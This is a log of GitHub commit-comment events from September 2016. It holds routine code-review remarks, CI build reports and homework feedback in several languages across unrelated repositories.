{"id":"4499903659","type":"CommitCommentEvent","actor":{"login":"Sn0wCrack"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18856518,"position":null,"line":null,"path":null,"commit_id":"dd24e873bf30a33ccb6637e89359995d3e5414bc","created_at":"2016-09-01T01:14:27Z","updated_at":"2016-09-01T01:14:27Z","body":"I've made the change in the latest commit:\r\nhttps://github.com/Sn0wCrack/ExHentai-Archive/commit/d2be7f33ee75c76e99489aea1ea7e95fe393f6e4\r\n\r\nShould be a bit cleaner now."}},"created_at":"2016-09-01T01:14:27Z"}
{"id":"4499904133","type":"CommitCommentEvent","actor":{"login":"zlucasmenezes"},"repo":{"name":"zlucasmenezes/AppointmentSchedulerWebApi"},"payload":{"comment":{"id":18856519,"position":null,"line":null,"path":null,"commit_id":"8ae96ae6a774444ffa9ef743a40847eedae55c23","created_at":"2016-09-01T01:14:36Z","updated_at":"2016-09-01T01:14:36Z","body":"The name of the class is \"Customer\" instead of \"Client\"."}},"created_at":"2016-09-01T01:14:36Z"}
{"id":"4499906916","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856528,"position":null,"line":null,"path":null,"commit_id":"542c1e2a7a22ee9406f59bd6e080c9b867faea5d","created_at":"2016-09-01T01:15:36Z","updated_at":"2016-09-01T01:15:36Z","body":"Other than the listening to errors in the wrong emitter, :+1:.\r\n\r\nPlease be careful. And remember that your having push access doesn't mean that you should never sent actual PRs."}},"created_at":"2016-09-01T01:15:36Z"}
{"id":"4499907952","type":"CommitCommentEvent","actor":{"login":"jlerman44"},"repo":{"name":"SBRG/bigg_models"},"payload":{"comment":{"id":18856533,"position":null,"line":null,"path":null,"commit_id":"49cc1814bf8f5afc7f1f667e1465a7f000a93f2c","created_at":"2016-09-01T01:15:58Z","updated_at":"2016-09-01T01:15:58Z","body":"if github had a like button, i'd press it for this "}},"created_at":"2016-09-01T01:15:58Z"}
{"id":"4499909024","type":"CommitCommentEvent","actor":{"login":"xushiwei"},"repo":{"name":"nareix/joy4"},"payload":{"comment":{"id":18856537,"position":62,"line":62,"path":"cmd/joy4/README.md","commit_id":"8231f75c6797822e8025e4aa64662e76161f3da4","created_at":"2016-09-01T01:16:21Z","updated_at":"2016-09-01T01:16:21Z","body":"这个 type 是指播放端的格式？"}},"created_at":"2016-09-01T01:16:21Z"}
{"id":"4499915677","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856554,"position":null,"line":null,"path":null,"commit_id":"542c1e2a7a22ee9406f59bd6e080c9b867faea5d","created_at":"2016-09-01T01:18:54Z","updated_at":"2016-09-01T01:18:54Z","body":"Yeah I am aware, and still make PRs for most things actually. I blame\nmyself for rushing this commit because I was occupied with other things.\nI'll try to be more careful in the future.\n"}},"created_at":"2016-09-01T01:18:54Z"}
{"id":"4499916812","type":"CommitCommentEvent","actor":{"login":"xushiwei"},"repo":{"name":"nareix/joy4"},"payload":{"comment":{"id":18856556,"position":63,"line":63,"path":"cmd/joy4/README.md","commit_id":"8231f75c6797822e8025e4aa64662e76161f3da4","created_at":"2016-09-01T01:19:19Z","updated_at":"2016-09-01T01:19:19Z","body":"这个字段是什么含义"}},"created_at":"2016-09-01T01:19:19Z"}
{"id":"4499917255","type":"CommitCommentEvent","actor":{"login":"HelenaOliveira1"},"repo":{"name":"HelenaOliveira1/Exerciciosprova2bim"},"payload":{"comment":{"id":18856558,"position":null,"line":null,"path":null,"commit_id":"8630bd8b5c1d16c1204255c00dc3e9e753cd01a1","created_at":"2016-09-01T01:19:29Z","updated_at":"2016-09-01T01:19:29Z","body":"Questão ERRADA!"}},"created_at":"2016-09-01T01:19:29Z"}
{"id":"4499918103","type":"CommitCommentEvent","actor":{"login":"xushiwei"},"repo":{"name":"nareix/joy4"},"payload":{"comment":{"id":18856559,"position":71,"line":71,"path":"cmd/joy4/README.md","commit_id":"8231f75c6797822e8025e4aa64662e76161f3da4","created_at":"2016-09-01T01:19:49Z","updated_at":"2016-09-01T01:19:49Z","body":"同一个流应该有多个play请求？remoteAddr 是指？"}},"created_at":"2016-09-01T01:19:49Z"}
{"id":"4499918151","type":"CommitCommentEvent","actor":{"login":"nate7"},"repo":{"name":"nate7/big-banking"},"payload":{"comment":{"id":18856560,"position":null,"line":null,"path":null,"commit_id":"8a4cf07b3fafce54451f01f9d9d6c90ea0e9c544","created_at":"2016-09-01T01:19:50Z","updated_at":"2016-09-01T01:19:50Z","body":"hello there"}},"created_at":"2016-09-01T01:19:50Z"}
{"id":"4499918286","type":"CommitCommentEvent","actor":{"login":"tnordloh"},"repo":{"name":"tnordloh/knight_moves"},"payload":{"comment":{"id":18856561,"position":29,"line":34,"path":"lib/chess/path.rb","commit_id":"dbf264b598b7d20ef52a5c2ee71f3845fda4ad34","created_at":"2016-09-01T01:19:53Z","updated_at":"2016-09-01T01:19:53Z","body":"test markdown\r\n```test_code.send(\"this is a test\")\r\n```"}},"created_at":"2016-09-01T01:19:53Z"}
{"id":"4499918835","type":"CommitCommentEvent","actor":{"login":"HelenaOliveira1"},"repo":{"name":"HelenaOliveira1/Exerciciosprova2bim"},"payload":{"comment":{"id":18856563,"position":null,"line":null,"path":null,"commit_id":"8630bd8b5c1d16c1204255c00dc3e9e753cd01a1","created_at":"2016-09-01T01:20:08Z","updated_at":"2016-09-01T01:20:08Z","body":" **Questão ERRADA!**"}},"created_at":"2016-09-01T01:20:08Z"}
{"id":"4499919547","type":"CommitCommentEvent","actor":{"login":"HelenaOliveira1"},"repo":{"name":"HelenaOliveira1/Exerciciosprova2bim"},"payload":{"comment":{"id":18856564,"position":null,"line":null,"path":null,"commit_id":"797e2f391afbab74938bc172c1bc545f8e82223b","created_at":"2016-09-01T01:20:23Z","updated_at":"2016-09-01T01:20:23Z","body":"**Questão ERRADA!**"}},"created_at":"2016-09-01T01:20:23Z"}
{"id":"4499920950","type":"CommitCommentEvent","actor":{"login":"HelenaOliveira1"},"repo":{"name":"HelenaOliveira1/Exerciciosprova2bim"},"payload":{"comment":{"id":18856568,"position":null,"line":null,"path":null,"commit_id":"797e2f391afbab74938bc172c1bc545f8e82223b","created_at":"2016-09-01T01:20:57Z","updated_at":"2016-09-01T01:20:57Z","body":"**Questão Meia Certa!**"}},"created_at":"2016-09-01T01:20:57Z"}
{"id":"4499921694","type":"CommitCommentEvent","actor":{"login":"Dart2112"},"repo":{"name":"Synapz1/Paintball"},"payload":{"comment":{"id":18856570,"position":null,"line":null,"path":null,"commit_id":"fa890931514637cd7bd0009660d50d2cecacafe5","created_at":"2016-09-01T01:21:14Z","updated_at":"2016-09-01T01:21:14Z","body":"In intelij you need to compile using maven rather than the default compiler "}},"created_at":"2016-09-01T01:21:14Z"}
{"id":"4499922225","type":"CommitCommentEvent","actor":{"login":"HelenaOliveira1"},"repo":{"name":"HelenaOliveira1/Exerciciosprova2bim"},"payload":{"comment":{"id":18856574,"position":null,"line":null,"path":null,"commit_id":"a9be3023b5700fda05f296d63f9dc1a62f7449b9","created_at":"2016-09-01T01:21:25Z","updated_at":"2016-09-01T01:21:25Z","body":"**Questão Meia Certa!**"}},"created_at":"2016-09-01T01:21:25Z"}
{"id":"4499923033","type":"CommitCommentEvent","actor":{"login":"mcarltzu"},"repo":{"name":"jjethwa/rundeck"},"payload":{"comment":{"id":18856579,"position":null,"line":null,"path":null,"commit_id":"3358ff8e43429a634d619123a2c26aaaacb20e5e","created_at":"2016-09-01T01:21:44Z","updated_at":"2016-09-01T01:21:44Z","body":"Hi, what is that MaxMetaspaceSize for? Im a newbie in docker XD"}},"created_at":"2016-09-01T01:21:44Z"}
{"id":"4499925134","type":"CommitCommentEvent","actor":{"login":"Sunako"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18856583,"position":null,"line":null,"path":null,"commit_id":"dd24e873bf30a33ccb6637e89359995d3e5414bc","created_at":"2016-09-01T01:22:30Z","updated_at":"2016-09-01T01:22:30Z","body":"I suppose that works too. Thanks."}},"created_at":"2016-09-01T01:22:30Z"}
{"id":"4499927034","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":18856586,"position":16,"line":45,"path":"components/date-picker/index.tsx","commit_id":"a6d7cc0035268cb5e946e047e1842af3ec60a2e5","created_at":"2016-09-01T01:23:05Z","updated_at":"2016-09-01T01:23:05Z","body":"有个疑问，这货是干嘛用的，文档&demo 里面都没有出现。"}},"created_at":"2016-09-01T01:23:05Z"}
{"id":"4499929364","type":"CommitCommentEvent","actor":{"login":"Synapz1"},"repo":{"name":"Synapz1/Paintball"},"payload":{"comment":{"id":18856597,"position":null,"line":null,"path":null,"commit_id":"fa890931514637cd7bd0009660d50d2cecacafe5","created_at":"2016-09-01T01:23:58Z","updated_at":"2016-09-01T01:23:58Z","body":"How do i do that lol. What setting is that?"}},"created_at":"2016-09-01T01:23:58Z"}
{"id":"4499930769","type":"CommitCommentEvent","actor":{"login":"wangdongCCNU"},"repo":{"name":"wangdongCCNU/MimosaBMRDO"},"payload":{"comment":{"id":18856600,"position":null,"line":null,"path":null,"commit_id":"18b8266bed3915b59d712344d66a294294142f6b","created_at":"2016-09-01T01:24:28Z","updated_at":"2016-09-01T01:24:28Z","body":"This is the first version, we have implemented the automatically fetch the .bit file from a server and then download to the xilinx pga"}},"created_at":"2016-09-01T01:24:28Z"}
{"id":"4499932315","type":"CommitCommentEvent","actor":{"login":"xushiwei"},"repo":{"name":"nareix/joy4"},"payload":{"comment":{"id":18856603,"position":81,"line":81,"path":"cmd/joy4/README.md","commit_id":"8231f75c6797822e8025e4aa64662e76161f3da4","created_at":"2016-09-01T01:25:03Z","updated_at":"2016-09-01T01:25:03Z","body":"GET /v1/streams?id=1\r\n\r\n考虑到 stream id（也就是 key）可能包含 /，这里我没有用 GET /v1/streams/<id> 形式"}},"created_at":"2016-09-01T01:25:03Z"}
{"id":"4499932471","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18856604,"position":null,"line":null,"path":null,"commit_id":"2693dfbe192d36a3d04a60faa22b0659fd24050c","created_at":"2016-09-01T01:25:06Z","updated_at":"2016-09-01T01:25:06Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/34737/testReport/) for this commit**"}},"created_at":"2016-09-01T01:25:06Z"}
{"id":"4499932856","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18856606,"position":null,"line":null,"path":null,"commit_id":"2693dfbe192d36a3d04a60faa22b0659fd24050c","created_at":"2016-09-01T01:25:13Z","updated_at":"2016-09-01T01:25:13Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/34739/testReport/) for this commit**"}},"created_at":"2016-09-01T01:25:13Z"}
{"id":"4499932858","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-landingpage"},"payload":{"comment":{"id":18856607,"position":7,"line":7,"path":"Assignment 4 - Javascript Basics/js/script.js","commit_id":"223a9251f97e0b36a81169c36c3a30f9fbafa5b8","created_at":"2016-09-01T01:25:14Z","updated_at":"2016-09-01T01:25:14Z","body":"Awesome job with the bonus challenges and using callback functions!"}},"created_at":"2016-09-01T01:25:14Z"}
{"id":"4499932880","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18856609,"position":null,"line":null,"path":null,"commit_id":"21e878b3ae76dbf54b651250f5230f4ac7a229b3","created_at":"2016-09-01T01:25:14Z","updated_at":"2016-09-01T01:25:14Z","body":"5626-Plant-HX-min-DT (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2367 of 2367 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-01T01:25:14Z"}
{"id":"4499933927","type":"CommitCommentEvent","actor":{"login":"Dart2112"},"repo":{"name":"Synapz1/Paintball"},"payload":{"comment":{"id":18856613,"position":null,"line":null,"path":null,"commit_id":"fa890931514637cd7bd0009660d50d2cecacafe5","created_at":"2016-09-01T01:25:38Z","updated_at":"2016-09-01T01:25:38Z","body":"Just google how to compile with maven in intelij idea and it will show you where it is. I've got it on the top bar, but Im not sure if I added that or if it's there by default "}},"created_at":"2016-09-01T01:25:38Z"}
{"id":"4499934949","type":"CommitCommentEvent","actor":{"login":"YuxuanLin"},"repo":{"name":"YuxuanLin/CoPlayV2"},"payload":{"comment":{"id":18856616,"position":null,"line":null,"path":null,"commit_id":"38b54167db5111b5a18dcb45a3bbef6da297d6e2","created_at":"2016-09-01T01:26:02Z","updated_at":"2016-09-01T01:26:02Z","body":"https://www.pivotaltracker.com/story/show/129583917"}},"created_at":"2016-09-01T01:26:02Z"}
{"id":"4499935930","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18856619,"position":null,"line":null,"path":null,"commit_id":"21e878b3ae76dbf54b651250f5230f4ac7a229b3","created_at":"2016-09-01T01:26:23Z","updated_at":"2016-09-01T01:26:23Z","body":"5626-Plant-HX-min-DT (EnergyArchmage) - Win64-Windows-7-VisualStudio-12: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-01T01:26:23Z"}
{"id":"4499938415","type":"CommitCommentEvent","actor":{"login":"luvsungae"},"repo":{"name":"luvsungae/Sungae-Park-Page"},"payload":{"comment":{"id":18856624,"position":null,"line":null,"path":null,"commit_id":"cacb14366b56a38e9963cc266e32de057304d216","created_at":"2016-09-01T01:27:18Z","updated_at":"2016-09-01T01:27:18Z","body":"revised"}},"created_at":"2016-09-01T01:27:18Z"}
{"id":"4499938496","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856625,"position":null,"line":null,"path":null,"commit_id":"9de74a9ac2f144ec9cf2e12367ce984833b30a54","created_at":"2016-09-01T01:27:20Z","updated_at":"2016-09-01T01:27:20Z","body":"何度もすみません。以下の文に修正します。\r\n```\r\nSo Ryu-book readers must search the details page of each protocol from the top page of Ryu documents.\r\nThis patch modifies the link destination URL from the top page of Ryu documents to the details page of each protocol.\r\n```"}},"created_at":"2016-09-01T01:27:20Z"}
{"id":"4499939630","type":"CommitCommentEvent","actor":{"login":"pubwebmarketing"},"repo":{"name":"OmniSharp/omnisharp-vscode"},"payload":{"comment":{"id":18856630,"position":null,"line":null,"path":null,"commit_id":"077d758ef947f6eda65519e012cdd32b8a7d96cd","created_at":"2016-09-01T01:27:47Z","updated_at":"2016-09-01T01:27:47Z","body":"[9217 Yin Yang Marketing_Final_LR_UK.pdf](https://github.com/OmniSharp/omnisharp-vscode/files/440543/9217.Yin.Yang.Marketing_Final_LR_UK.pdf)\r\n"}},"created_at":"2016-09-01T01:27:47Z"}
{"id":"4499940078","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18856633,"position":null,"line":null,"path":null,"commit_id":"a4454aa02c189959cebc49a32cd256c5672f9879","created_at":"2016-09-01T01:27:58Z","updated_at":"2016-09-01T01:27:58Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2284 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.62%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T01:27:58Z"}
{"id":"4499941367","type":"CommitCommentEvent","actor":{"login":"xushiwei"},"repo":{"name":"nareix/joy4"},"payload":{"comment":{"id":18856636,"position":15,"line":15,"path":"cmd/joy4/README.md","commit_id":"8231f75c6797822e8025e4aa64662e76161f3da4","created_at":"2016-09-01T01:28:28Z","updated_at":"2016-09-01T01:28:28Z","body":"可能一上来先需要解释的是 concept，比如 stream 是什么，channel 是什么。"}},"created_at":"2016-09-01T01:28:28Z"}
{"id":"4499944113","type":"CommitCommentEvent","actor":{"login":"arielwulkan"},"repo":{"name":"arielwulkan/curriculum"},"payload":{"comment":{"id":18856640,"position":5,"line":822,"path":"web_development_101/project_html_css.md","commit_id":"89fb30dd01b5919394e5faf7d4432be0f1141fef","created_at":"2016-09-01T01:29:30Z","updated_at":"2016-09-01T01:29:30Z","body":"My solution  https://github.com/arielwulkan/google-homepage"}},"created_at":"2016-09-01T01:29:30Z"}
{"id":"4499945698","type":"CommitCommentEvent","actor":{"login":"xlxfoxxlx"},"repo":{"name":"ChikaraOSP/packages_apps_settings"},"payload":{"comment":{"id":18856641,"position":null,"line":null,"path":null,"commit_id":"f52917d8c0e31af6e361255de55acd9cbb8423ed","created_at":"2016-09-01T01:30:05Z","updated_at":"2016-09-01T01:30:05Z","body":":/"}},"created_at":"2016-09-01T01:30:05Z"}
{"id":"4499946239","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-landingpage"},"payload":{"comment":{"id":18856642,"position":29,"line":29,"path":"Assignment 4 - Javascript Basics/js/script.js","commit_id":"223a9251f97e0b36a81169c36c3a30f9fbafa5b8","created_at":"2016-09-01T01:30:15Z","updated_at":"2016-09-01T01:30:15Z","body":"Great job specifying the speed with the `.slideUp` method!"}},"created_at":"2016-09-01T01:30:15Z"}
{"id":"4499949612","type":"CommitCommentEvent","actor":{"login":"Sunako"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18856648,"position":null,"line":null,"path":null,"commit_id":"dd24e873bf30a33ccb6637e89359995d3e5414bc","created_at":"2016-09-01T01:31:21Z","updated_at":"2016-09-01T01:31:21Z","body":"Actually not quite, it still attempts to delete the gallery since it sees that the row continually exists with the delete column set. You may need an extra column or something to tell the cleanup task a gallery has already been cleaned up so it doesn't keep trying."}},"created_at":"2016-09-01T01:31:21Z"}
{"id":"4499950518","type":"CommitCommentEvent","actor":{"login":"tnordloh"},"repo":{"name":"tnordloh/knight_moves"},"payload":{"comment":{"id":18856649,"position":29,"line":34,"path":"lib/chess/path.rb","commit_id":"dbf264b598b7d20ef52a5c2ee71f3845fda4ad34","created_at":"2016-09-01T01:31:39Z","updated_at":"2016-09-01T01:31:39Z","body":"test adding a comment\r\n"}},"created_at":"2016-09-01T01:31:39Z"}
{"id":"4499951854","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18856652,"position":null,"line":null,"path":null,"commit_id":"21e878b3ae76dbf54b651250f5230f4ac7a229b3","created_at":"2016-09-01T01:32:07Z","updated_at":"2016-09-01T01:32:07Z","body":"5626-Plant-HX-min-DT (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T01:32:07Z"}
{"id":"4499952207","type":"CommitCommentEvent","actor":{"login":"lizzywheat"},"repo":{"name":"lizzywheat/Elizabeth-Wheat"},"payload":{"comment":{"id":18856654,"position":null,"line":null,"path":null,"commit_id":"a2577346cd67a57d376883e056123ff6838614a4","created_at":"2016-09-01T01:32:14Z","updated_at":"2016-09-01T01:32:14Z","body":" adverts3.pdf"}},"created_at":"2016-09-01T01:32:14Z"}
{"id":"4499953036","type":"CommitCommentEvent","actor":{"login":"kudataz"},"repo":{"name":"reek/anti-adblock-killer"},"payload":{"comment":{"id":18856656,"position":null,"line":null,"path":null,"commit_id":"5bfedcb438c9416948cc8848f44651e15035bdd6","created_at":"2016-09-01T01:32:31Z","updated_at":"2016-09-01T01:32:31Z","body":"hey whats this? im on list"}},"created_at":"2016-09-01T01:32:31Z"}
{"id":"4499954825","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-landingpage"},"payload":{"comment":{"id":18856660,"position":19,"line":19,"path":"Assignment 4 - Javascript Basics/js/script.js","commit_id":"223a9251f97e0b36a81169c36c3a30f9fbafa5b8","created_at":"2016-09-01T01:33:10Z","updated_at":"2016-09-01T01:33:10Z","body":"Your code is looking great, but one minor detail - try to watch your indentation on functions. The first line should line up with the last line. For example, the above function should be indented like this:\r\n```\r\n$(\".button\").click(function(){\r\n    event.preventDefault();\r\n    alert( \"We're Not Ready For Sign-Ups...Yet.\" );\r\n });\r\n```"}},"created_at":"2016-09-01T01:33:10Z"}
{"id":"4499955039","type":"CommitCommentEvent","actor":{"login":"henrique18bh"},"repo":{"name":"henrique18bh/ProjetoLaravel"},"payload":{"comment":{"id":18856661,"position":4,"line":9,"path":"resources/views/home.blade.php","commit_id":"40ed61afa5d4f9a8bd7b983e00094dd47005d55b","created_at":"2016-09-01T01:33:14Z","updated_at":"2016-09-01T01:33:14Z","body":"Ta errado"}},"created_at":"2016-09-01T01:33:14Z"}
{"id":"4499955121","type":"CommitCommentEvent","actor":{"login":"intrauterino"},"repo":{"name":"Lordmau5/Tidown"},"payload":{"comment":{"id":18856663,"position":null,"line":null,"path":null,"commit_id":"368be3c8f0c17b577ad6b9dc7e5dcc62dedf63b2","created_at":"2016-09-01T01:33:16Z","updated_at":"2016-09-01T01:33:16Z","body":"hello, I have been following all the steps to download music but I can not do it, could better SPECIFY instructions or would it be better to return to make another video where everything you need for example is required: install node, run the commands .... . thanks to all"}},"created_at":"2016-09-01T01:33:16Z"}
{"id":"4499955964","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18856667,"position":null,"line":null,"path":null,"commit_id":"a4454aa02c189959cebc49a32cd256c5672f9879","created_at":"2016-09-01T01:33:32Z","updated_at":"2016-09-01T01:33:32Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-01T01:33:32Z"}
{"id":"4499958201","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856673,"position":15,"line":15,"path":"sources/simple_switch_13.py","commit_id":"62a215090ed802934b2943e7e3d5fe4a5d1a743c","created_at":"2016-09-01T01:34:20Z","updated_at":"2016-09-01T01:34:20Z","body":"今までの方式では消すべきであったと思います。\r\n今回より、ソースはRyuパッケージのファイルから引き込む形式に変更しますので\r\n```\r\n.. literalinclude:: ファイル名\r\n   :lines: 16-\r\n```\r\nのようにコピーライト表記を抜いた形で取り込むことで対処とさせていただきます。\r\n上記の場合、16行目以降を表示となります。"}},"created_at":"2016-09-01T01:34:20Z"}
{"id":"4499960496","type":"CommitCommentEvent","actor":{"login":"YuxuanLin"},"repo":{"name":"YuxuanLin/CoPlayV2"},"payload":{"comment":{"id":18856683,"position":null,"line":null,"path":null,"commit_id":"d4a5dcebceb5d90ab9bf9fd10a9af3596ce0be38","created_at":"2016-09-01T01:35:12Z","updated_at":"2016-09-01T01:35:12Z","body":"https://www.pivotaltracker.com/story/show/129584083"}},"created_at":"2016-09-01T01:35:12Z"}
{"id":"4499960767","type":"CommitCommentEvent","actor":{"login":"b2gills"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":18856686,"position":52,"line":1147,"path":"docs/ops.markdown","commit_id":"150760304e1d72c0435a334edccdcb5e773f006a","created_at":"2016-09-01T01:35:18Z","updated_at":"2016-09-01T01:35:18Z","body":"Copy Pasta: should be `decodertakeallchars`"}},"created_at":"2016-09-01T01:35:18Z"}
{"id":"4499963109","type":"CommitCommentEvent","actor":{"login":"mlspinylobster"},"repo":{"name":"onnfetuya/sanmoku"},"payload":{"comment":{"id":18856688,"position":10,"line":7,"path":"sanmoku.rb","commit_id":"eb43ea79a407f1eb481f4cf7d3de72ad7eed6608","created_at":"2016-09-01T01:36:08Z","updated_at":"2016-09-01T01:36:08Z","body":"Rubyの場合、処理の途中でreturnする時以外は書かなくて良いよ"}},"created_at":"2016-09-01T01:36:08Z"}
{"id":"4499964117","type":"CommitCommentEvent","actor":{"login":"Thecakeisgit"},"repo":{"name":"GG84/lobot"},"payload":{"comment":{"id":18856691,"position":null,"line":null,"path":null,"commit_id":"b3ed67a5b4e482d1e19ff5391caafbf45f690fd4","created_at":"2016-09-01T01:36:30Z","updated_at":"2016-09-01T01:36:30Z","body":"xD"}},"created_at":"2016-09-01T01:36:30Z"}
{"id":"4499964328","type":"CommitCommentEvent","actor":{"login":"jfly"},"repo":{"name":"cubing/worldcubeassociation.org"},"payload":{"comment":{"id":18856692,"position":null,"line":null,"path":null,"commit_id":"675c69fb34832292173cf3b79b74e4bc1c909afe","created_at":"2016-09-01T01:36:34Z","updated_at":"2016-09-01T01:36:34Z","body":"Fun! But I see commented out code... "}},"created_at":"2016-09-01T01:36:34Z"}
{"id":"4499964480","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856693,"position":18,"line":18,"path":"en/source/sources/ping_responder.py","commit_id":"69059876e9e121ae941025aaeb011a208aaea44d","created_at":"2016-09-01T01:36:38Z","updated_at":"2016-09-01T01:36:38Z","body":"sources: Code simplification of simple_switch_13.py のコメントでも回答しましたが、\r\n今回より、ソースはRyuパッケージのファイルから引き込む形式に変更しますので\r\n```\r\n.. literalinclude:: ファイル名\r\n   :lines: 19-\r\n```\r\nのようにコピーライト表記を抜いた形で取り込むことで対処とさせていただきます。\r\n上記の場合、19行目以降を表示となります。\r\n"}},"created_at":"2016-09-01T01:36:38Z"}
{"id":"4499964519","type":"CommitCommentEvent","actor":{"login":"pjlsergeant"},"repo":{"name":"pjlsergeant/test-bdd-cucumber-perl"},"payload":{"comment":{"id":18856694,"position":null,"line":null,"path":null,"commit_id":"061d26609a75b87462a84ec87c83b870bc388bb9","created_at":"2016-09-01T01:36:39Z","updated_at":"2016-09-01T01:36:39Z","body":"@ehuelsmann OK, new patch means that this:\r\n\r\n```\r\nfind xt/66-cucumber -type f | grep \".feature$\" | PERL5LIB=\"../test-bdd-cucumber-perl/lib/:lib/:t/lib:\"  xargs prove -Ilib --source Feature\r\n```\r\n\r\nGets far enough along to complain about connecting to Postgres, which I think means I've fixed your problem. Please have a play and let me know. For some reason can't tag @ylavoie here, so please point him this way too"}},"created_at":"2016-09-01T01:36:39Z"}
{"id":"4499966026","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18856699,"position":11,"line":909,"path":"data/lua/wml-tags.lua","commit_id":"3f7db7f8789e6d3b2091890edc755bea49b08009","created_at":"2016-09-01T01:37:12Z","updated_at":"2016-09-01T01:37:12Z","body":"I guess I don't mind removing the check for auto_recall, or accepting a PR that does so."}},"created_at":"2016-09-01T01:37:12Z"}
{"id":"4499971214","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856710,"position":15,"line":15,"path":"sources/simple_switch_13.py","commit_id":"62a215090ed802934b2943e7e3d5fe4a5d1a743c","created_at":"2016-09-01T01:39:08Z","updated_at":"2016-09-01T01:39:08Z","body":"そうですね！、行指定で冗長な部分が抜けるのはいいですね！"}},"created_at":"2016-09-01T01:39:08Z"}
